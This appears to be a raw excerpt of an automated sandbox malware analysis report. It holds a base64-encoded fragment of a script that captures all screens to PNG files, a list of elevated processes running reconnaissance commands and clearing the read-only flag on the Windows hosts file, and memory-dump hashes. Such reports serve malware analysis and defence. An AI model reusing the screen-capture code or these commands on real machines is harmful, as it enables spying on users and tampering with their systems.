AgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:101
                                                            Start time:15:01:21
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:102
                                                            Start time:15:01:21
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:103
                                                            Start time:15:01:21
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff6d1340000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:104
                                                            Start time:15:01:23
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:105
                                                            Start time:15:01:23
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:106
                                                            Start time:15:01:23
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:107
                                                            Start time:15:01:23
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:108
                                                            Start time:15:01:23
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:109
                                                            Start time:15:01:23
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline"
                                                            Imagebase:0x7ff646510000
                                                            File size:2'759'232 bytes
                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:110
                                                            Start time:15:01:23
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff6d1340000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:179
                                                            Start time:15:01:26
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\Conhost.exe
                                                            Wow64 process (32bit):
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:184
                                                            Start time:15:01:27
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\Conhost.exe
                                                            Wow64 process (32bit):
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:209
                                                            Start time:15:01:38
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\Conhost.exe
                                                            Wow64 process (32bit):
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:224
                                                            Start time:15:01:41
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\Conhost.exe
                                                            Wow64 process (32bit):
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Reset < >
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1717248259.0000000005EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5ee0000_47SXvEQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 77f93baac8891064aa652cce9346632065bf8bfe921989d8c7de6e6d188997ab
                                                              • Instruction ID: 2a028c55004cb40217cd8af872f8884d771fab29aca1b765da1e61380c8440f1
                                                              • Opcode Fuzzy Hash: 77f93baac8891064aa652cce9346632065bf8bfe921989d8c7de6e6d188997ab
                                                              • Instruction Fuzzy Hash: 9DE0DFBB26C025AE6A45C9462B188F6272FE2D5330720A027F887C1214E2E60E79E171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: P
                                                              • API String ID: 0-3110715001
                                                              • Opcode ID: 2f5c520591e353e449170fdf355375ef8e94d9691e2abcdbc19ff44696ae6ccf
                                                              • Instruction ID: ccc16c3a7c6c848886f3bf00e748afcbcff05a61ab8d0f06af4808def86387e1
                                                              • Opcode Fuzzy Hash: 2f5c520591e353e449170fdf355375ef8e94d9691e2abcdbc19ff44696ae6ccf
                                                              • Instruction Fuzzy Hash: 67F062EB14C2506CB301C1522B6CBF75B2FE4D27323799867F80AC4986D68D4B5E7132
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd95002929cfc74b439b25dcb654d86997ed23a28e2ae4e7d60cd070050ed5d3
                                                              • Instruction ID: d660e5ec1d6a70f7cf4ebdf88af1dc57c16b4318efcb5039198453f612b793bb
                                                              • Opcode Fuzzy Hash: bd95002929cfc74b439b25dcb654d86997ed23a28e2ae4e7d60cd070050ed5d3
                                                              • Instruction Fuzzy Hash: 6011D6AB25D152BD7201C4862B2CFFB522FE1D67313B9A826F80BD5582DA9C4A5A3031
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 47ff4cf79e02651f5a9aad0af3280425ffcac651c9c004c7f077e662af0edd16
                                                              • Instruction ID: 76a318738cd7e03dbc71f6738ac6f64b6d34ff4d2babd8f300944d91adf8e120
                                                              • Opcode Fuzzy Hash: 47ff4cf79e02651f5a9aad0af3280425ffcac651c9c004c7f077e662af0edd16
                                                              • Instruction Fuzzy Hash: C711C5EB25D152BC7201C0862B2CFFB522FE1D67313B8A826F80BD5586DB9C4B4A3031
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c0982fa75b86af8f0ca29dc62c16eb703e7d41f3536ec9a4f5de1d5850b714de
                                                              • Instruction ID: 6b04c08bec24f5f75f9e16a67959e4be1897c08e9b9d07eafc25e7f89b605f8a
                                                              • Opcode Fuzzy Hash: c0982fa75b86af8f0ca29dc62c16eb703e7d41f3536ec9a4f5de1d5850b714de
                                                              • Instruction Fuzzy Hash: 2001E5EB25D156BC7201C0822B5CFFB522FE0D67313B8A826F84BD5582DB9C4B8A3071
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3a24de80bff61d58ac15ef8ade9e80033b91df5f53a45ed45446f10f62c689ea
                                                              • Instruction ID: e5524161bcf82f79886554ac27390d6855a343e1beabefd5c3335d392beac4aa
                                                              • Opcode Fuzzy Hash: 3a24de80bff61d58ac15ef8ade9e80033b91df5f53a45ed45446f10f62c689ea
                                                              • Instruction Fuzzy Hash: CD11A0AB20D292ADA301C0952B1CFFB6B1FE5C67313B8A827F447D55C2DA8C474A7170
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4a7b9cf83c0d1bf2ccd2781cda391aa2eadde171144ef9309952efca71d8026b
                                                              • Instruction ID: 610c1ce2570c9c11e7e224c3523020b91d70e851893fb0f2cbf757df160d1ef2
                                                              • Opcode Fuzzy Hash: 4a7b9cf83c0d1bf2ccd2781cda391aa2eadde171144ef9309952efca71d8026b
                                                              • Instruction Fuzzy Hash: 1A0105AB21D112BC7201C4862B1CFFB522FE0D67313B8E826F80BD5586EA9C5B4A3171
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 46dc8e9ff736c55a5179d4469849465d1955fd449eb4ae5c4f912c55f446bee2
                                                              • Instruction ID: bcd98ea6c8269a19005353a4576dec99b2f8f168d1c45f17da99f3fc8a7236f9
                                                              • Opcode Fuzzy Hash: 46dc8e9ff736c55a5179d4469849465d1955fd449eb4ae5c4f912c55f446bee2
                                                              • Instruction Fuzzy Hash: D5015ADB21D151BCA241C1562A2CBF75B2FE0D26723B8B827F44BD5582DA8D4B4A7131
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1717248259.0000000005EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5ee0000_47SXvEQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dff4333fdc6b651554b84578ff8b3b273c0e06c78ebadb7a6a825bd0ca65f187
                                                              • Instruction ID: 11a9ae8c979a5e0071505adb14e9b7ce73c42ba4fc8534bf971ac787e10f40b7
                                                              • Opcode Fuzzy Hash: dff4333fdc6b651554b84578ff8b3b273c0e06c78ebadb7a6a825bd0ca65f187
                                                              • Instruction Fuzzy Hash: B9117D775682615FDF02DDA1564C5F73B27F793330720602BF8C285461E3954856D2B0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf7349f18a17a3978ac6fc4bd7e579f82a377655a794015eef60207e9ae52db2
                                                              • Instruction ID: d2a108bf7058b07986148fddbd4d9c8168b424c6fe1ef1b58f92eafa3fa35f64
                                                              • Opcode Fuzzy Hash: cf7349f18a17a3978ac6fc4bd7e579f82a377655a794015eef60207e9ae52db2
                                                              • Instruction Fuzzy Hash: B3019EA720D151BD6301C0816A5CBF7672FE1C67313B8A826F80BD6582DA9C47597031
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 61d5eb17845f392e2d01bd6ef0b55e823bcdd5109c8d1a85b411621cccdfdbaf
                                                              • Instruction ID: 826d5b0e6647779a4af996e65ead6501d8931818a3529ae28c1911d35f7c7c23
                                                              • Opcode Fuzzy Hash: 61d5eb17845f392e2d01bd6ef0b55e823bcdd5109c8d1a85b411621cccdfdbaf
                                                              • Instruction Fuzzy Hash: 960148AB20C252AC6301C0862A5CFFB561FE0C67313B8A826F80BD6582DA9C4B4A3030
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a613ab238fc3872a856baab053ede6aba5b4c06d25062085631af46634ceae0e
                                                              • Instruction ID: aafd231155995e65d1c6c2f432dca01de31fb039f9b31f03c57b4af5b75d21fe
                                                              • Opcode Fuzzy Hash: a613ab238fc3872a856baab053ede6aba5b4c06d25062085631af46634ceae0e
                                                              • Instruction Fuzzy Hash: 35F0E7EB25D151BC7201C0822B5CBF7461FE0D67322B8A827F84BE5582DA8D4B8A3031
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e9242dcd916629f334447b9c4154c35f046ac443ad86ad9dce445fa6f29c1fc0
                                                              • Instruction ID: ea02fcbb1919ab5abc0c40cf8d4ac4b0bd29faf4b7abb157e9796a0b843622c7
                                                              • Opcode Fuzzy Hash: e9242dcd916629f334447b9c4154c35f046ac443ad86ad9dce445fa6f29c1fc0
                                                              • Instruction Fuzzy Hash: FBF03CEB25C151BCB200C0922B5CBF7461FE1D67316B8A827F80BD4582DA8D4B9A3031
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1717248259.0000000005EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5ee0000_47SXvEQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1a1df0d26ab8f6d3fa8b852381f8a7df1da04a3d945729361e65657e12164385
                                                              • Instruction ID: c7a9fee0309ba74c2844005d2749501ba92a0427d30849e9506e00201687600b
                                                              • Opcode Fuzzy Hash: 1a1df0d26ab8f6d3fa8b852381f8a7df1da04a3d945729361e65657e12164385
                                                              • Instruction Fuzzy Hash: D30170731682149FDF52CD8517444F6376BF797330B205036FC4292061E3E64825F670
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a65d68d7f357262c86eb97f374ff33750957d682179e3271c8f0070f55f101e8
                                                              • Instruction ID: 0d45028a07ebf7ee580b8541ae00a7f04ee9401a66ce29dc335360155e446061
                                                              • Opcode Fuzzy Hash: a65d68d7f357262c86eb97f374ff33750957d682179e3271c8f0070f55f101e8
                                                              • Instruction Fuzzy Hash: 9EF0DAEB21D111AC7241D0422B6CBF7461FE0D17323B9E827F80BC45869B9C4B9A3035
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1717248259.0000000005EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5ee0000_47SXvEQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 571d60cdab74f2372255422e5833c61de1c831890ddae0e9437e0c65881ac27f
                                                              • Instruction ID: 9d63e1244f8896db69321d777efbfe251a9a59415a895951f87186d4131173be
                                                              • Opcode Fuzzy Hash: 571d60cdab74f2372255422e5833c61de1c831890ddae0e9437e0c65881ac27f
                                                              • Instruction Fuzzy Hash: 5CF0AC7762C2249FEB51D95517485F6332BF7D2330B20943BFC81C2861E396092AE1B1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1717248259.0000000005EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5ee0000_47SXvEQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5bb4fc491b95a0a9594a36373543ee568464b0b2b7a5ed24a75749870684ca8a
                                                              • Instruction ID: 212854839ecc41108f4424cc13ac78d90ca6686b9fd1d59e14c8386571977b20
                                                              • Opcode Fuzzy Hash: 5bb4fc491b95a0a9594a36373543ee568464b0b2b7a5ed24a75749870684ca8a
                                                              • Instruction Fuzzy Hash: 16E04FBB25816CAE6B45CD452B649FB262FEAC1330B20945AFC4682114E3A60C78E271
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1717248259.0000000005EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5ee0000_47SXvEQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9f0f523d76cbc3a1a9d03741904492ce68dfff565e90b20bbacdb0d8cdece78a
                                                              • Instruction ID: fc8c25ac192d481dcc7a6619843abaef496e5e3b66dd825a0610407ff5ae5048
                                                              • Opcode Fuzzy Hash: 9f0f523d76cbc3a1a9d03741904492ce68dfff565e90b20bbacdb0d8cdece78a
                                                              • Instruction Fuzzy Hash: 92E07DEB21C188AFA501D5B43F7C6FB171DD6D1730F107856F946D7182D2D60621C030
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1717248259.0000000005EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5ee0000_47SXvEQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 29bf489f75ada9735f1b2cea1faab1391d5d409c86a7fe9ef54f9cafe1aa208a
                                                              • Instruction ID: cec949fe2f116b53859aa6fee1f175c11cc745b5e77246284573fe5fa9fc8a98
                                                              • Opcode Fuzzy Hash: 29bf489f75ada9735f1b2cea1faab1391d5d409c86a7fe9ef54f9cafe1aa208a
                                                              • Instruction Fuzzy Hash: 6FD05EBB2AC064AD7104C9453A249F6132FD1E0730760D41BF846C1181E2951929D031
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 53b5c58d40f8e4d8307bca0baded34a515d12e680b5e0d5e06b82411448cf851
                                                              • Instruction ID: fb786f4944f48b61e959e970a05ce593ba519df170f72539f1a4e86c504fe9d8
                                                              • Opcode Fuzzy Hash: 53b5c58d40f8e4d8307bca0baded34a515d12e680b5e0d5e06b82411448cf851
                                                              • Instruction Fuzzy Hash: 47F09AAB5EC5619EA34BC155AA4EBFA175FA1D53303E8B913E006C85E19E4C4246B029
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1842785371.00007FF7F1461000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7F1460000, based on PE: true
                                                              • Associated: 00000001.00000002.1842678109.00007FF7F1460000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.1842832179.00007FF7F146D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.1842861964.00007FF7F1471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.1842901641.00007FF7F1472000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.1844805430.00007FF7F1966000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.1844854582.00007FF7F196A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff7f1460000_instals.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 42430f2344ef8e2c73b5046c9819b9514e03832da236caddbb8b9f06a9f0945f
                                                              • Instruction ID: ea513d005fc5f177dee7ac61c6caddbf3cacd89b555ed18b8d25085201c2169f
                                                              • Opcode Fuzzy Hash: 42430f2344ef8e2c73b5046c9819b9514e03832da236caddbb8b9f06a9f0945f
                                                              • Instruction Fuzzy Hash: A2B092B0A09209C4E3003F0298412A8A2606B88B88F800030C41C02392CBAD54414BA0

                                                              Execution Graph

                                                              Execution Coverage:8.7%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:20.1%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:23
                                                              execution_graph 15937 7ff62664ccac 15958 7ff62664ce7c 15937->15958 15940 7ff62664cdf8 16112 7ff62664d19c IsProcessorFeaturePresent 15940->16112 15941 7ff62664ccc8 __scrt_acquire_startup_lock 15943 7ff62664ce02 15941->15943 15950 7ff62664cce6 __scrt_release_startup_lock 15941->15950 15944 7ff62664d19c 7 API calls 15943->15944 15946 7ff62664ce0d _CreateFrameInfo 15944->15946 15945 7ff62664cd0b 15947 7ff62664cd91 15964 7ff62664d2e4 15947->15964 15949 7ff62664cd96 15967 7ff626641000 15949->15967 15950->15945 15950->15947 16101 7ff626659b9c 15950->16101 15956 7ff62664cdb9 15956->15946 16108 7ff62664d000 15956->16108 15959 7ff62664ce84 15958->15959 15960 7ff62664ce90 __scrt_dllmain_crt_thread_attach 15959->15960 15961 7ff62664ccc0 15960->15961 15962 7ff62664ce9d 15960->15962 15961->15940 15961->15941 15962->15961 16119 7ff62664d8f8 15962->16119 16146 7ff62666a540 15964->16146 15966 7ff62664d2fb GetStartupInfoW 15966->15949 15968 7ff626641009 15967->15968 16148 7ff6266554f4 15968->16148 15970 7ff6266437fb 16155 7ff6266436b0 15970->16155 15977 7ff62664383c 16315 7ff626641c80 15977->16315 15978 7ff62664391b 16324 7ff6266445b0 15978->16324 15982 7ff62664385b 16227 7ff626648a20 15982->16227 15983 7ff62664396a 16347 7ff626642710 15983->16347 15987 7ff62664388e 15994 7ff6266438bb __vcrt_freefls 15987->15994 16319 7ff626648b90 15987->16319 15988 7ff62664395d 15989 7ff626643984 15988->15989 15990 7ff626643962 15988->15990 15993 7ff626641c80 49 API calls 15989->15993 16343 7ff6266500bc 15990->16343 15995 7ff6266439a3 15993->15995 15996 7ff626648a20 14 API calls 15994->15996 16004 